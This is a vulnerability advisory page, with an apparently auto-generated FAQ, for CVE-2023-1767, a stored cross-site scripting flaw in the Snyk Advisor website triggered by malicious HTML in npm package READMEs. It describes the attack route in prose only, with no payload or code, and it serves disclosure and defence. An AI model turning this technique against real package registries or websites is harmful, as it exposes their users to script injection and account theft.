CVE-2023-1767: XSS
First published: Thu Apr 20 2023(Updated: )
The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor.
Credit: report@snyk.io
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Snyk Advisor | <2023-03-28 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
Frequently Asked Questions
What is CVE-2023-1767?
CVE-2023-1767 is a vulnerability where the Snyk Advisor website was vulnerable to a stored XSS attack.
What was the impact of CVE-2023-1767?
The vulnerability allowed an attacker to execute malicious scripts in the Snyk Advisor website, potentially leading to data theft or takeover of user accounts.
How was CVE-2023-1767 exploited?
An attacker could create a package with a markdown README file and exploit the vulnerability by injecting malicious scripts.
What is the severity rating of CVE-2023-1767?
CVE-2023-1767 has a severity rating of 5.4, indicating a medium level of severity.
How can I protect myself from CVE-2023-1767?
To protect yourself, ensure that you are using the latest version of the Snyk Advisor website and follow any security recommendations or patches provided by the vendor.
- collector/nvd-index
- agent/references
- agent/type
- agent/softwarecombine
- collector/mitre-cve
- source/MITRE
- agent/author
- agent/last-modified-date
- agent/weakness
- agent/severity
- agent/tags
- agent/description
- agent/event
- agent/first-publish-date
- agent/source
- vendor/snyk
- canonical/snyk advisor